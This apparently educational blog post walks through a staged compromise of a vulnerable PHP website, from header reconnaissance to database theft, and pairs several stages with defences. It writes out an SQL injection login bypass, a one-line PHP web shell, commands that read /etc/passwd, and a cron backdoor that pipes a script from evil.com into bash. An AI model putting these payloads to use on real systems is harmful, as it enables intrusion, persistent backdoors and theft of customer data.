Sunday, April 5, 2026 • Sachin Prajapati

How Hackers Compromise Vulnerable PHP Websites (Recon to Database Theft)

Below is a high-level educational simulation showing how an attacker might compromise a vulnerable website built with PHP.
This type of scenario is commonly practiced in cybersecurity labs and training platforms to understand how vulnerabilities lead to full compromise and how defenders can stop them.

⚠️ The purpose is defensive learning so developers and administrators can secure systems.

Scenario Overview

Target: A vulnerable PHP website running on Apache HTTP Server with a MySQL database.

The attacker’s goal:

Recon → Find vulnerability → Gain access → Execute commands → Access database → Steal data

Stage 1 — Reconnaissance (Finding Technology)

The attacker begins by gathering information about the website.

Checking HTTP headers

Response headers might reveal:

Server: Apache
X-Powered-By: PHP/8.0

Now the attacker knows:

  • Web server: Apache

  • Language: PHP

  • Likely database: MySQL

This information helps identify potential weaknesses.

Defensive lesson

Disable technology disclosure:

expose_php = Off

Stage 2 — Discover Hidden Pages

Attackers try discovering hidden directories.

Example guesses:

/admin
/uploads
/backup
/config

They may use automated tools such as:

  • Gobuster

  • DirBuster

Suppose the attacker discovers:

/admin/login.php
/uploads/

Stage 3 — Information Leakage

The attacker intentionally causes an error.

Example request:

https://site.com/product.php?id='

The site returns an error:

Warning: mysqli_query() in /var/www/html/product.php line 22

This reveals:

/var/www/html/

The attacker now knows the server directory structure.

Defensive lesson

Disable error display:

display_errors = Off

Stage 4 — SQL Injection Discovery

The attacker tests inputs for SQL injection.

Example login input:

Username: admin
Password: ' OR '1'='1

If the login succeeds, the query might be:

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

The condition becomes true, bypassing authentication.

Result

The attacker logs in as admin.

Defensive lesson

Use prepared statements in PHP.

Stage 5 — File Upload Vulnerability

Inside the admin panel there is a feature:

Upload product image

The attacker uploads a malicious file:

shell.php

Example malicious script:

<?php system($_GET['cmd']); ?>

The file is stored in:

/uploads/shell.php

Now the attacker visits:

site.com/uploads/shell.php?cmd=whoami

Server response:

www-data

This confirms command execution.

Stage 6 — Remote Command Execution

The attacker now has a web shell.

Example commands executed:

ls
pwd
cat /etc/passwd

The attacker explores the server.

Typical findings:

config.php
database.php
.env

Stage 7 — Database Credential Theft

The attacker reads the configuration file:

config.php

Example contents:

DB_HOST=localhost
DB_USER=root
DB_PASS=password123
DB_NAME=shop

Now the attacker has database credentials.

Stage 8 — Database Access

Using the stolen credentials, the attacker connects to the database.

Example tables:

users
orders
payments
admins

The attacker extracts user data such as:

emails
password hashes
addresses
payment records

This is data exfiltration.

Stage 9 — Privilege Escalation

The attacker tries to gain full server control.

They search for:

sudo misconfigurations
vulnerable services
weak permissions

If successful:

www-data → root

Now they control the entire system.

Stage 10 — Persistence (Backdoors)

To maintain access, the attacker installs backdoors.

Examples:

hidden PHP shells
cron jobs
reverse shells

Example cron job:

*/5 * * * * curl http://evil.com/backdoor.sh | bash

The attacker can now return anytime.

Stage 11 — Data Theft & Abuse

The attacker may now:

  • steal customer databases

  • sell credentials

  • send spam emails

  • launch botnet attacks

  • mine cryptocurrency

The website owner may not notice immediately.

Full Attack Chain Visualization

1. Recon (identify PHP + Apache)
2. Discover hidden directories
3. Trigger error messages
4. Find SQL injection
5. Login as admin
6. Upload web shell
7. Execute server commands
8. Read config files
9. Steal database credentials
10. Dump database
11. Install backdoors

How Proper Security Stops This Attack

Attack Step Defense
Recon hide PHP version
Error leaks disable display_errors
SQL injection prepared statements
File upload shell restrict file types
Command execution disable dangerous functions
File access open_basedir restriction
Database theft environment variable protection

Real-World Lesson

Many large platforms run safely on PHP, including:

  • WordPress

  • Drupal

  • Laravel

Security depends mostly on:

  • proper configuration

  • secure coding practices

  • regular penetration testing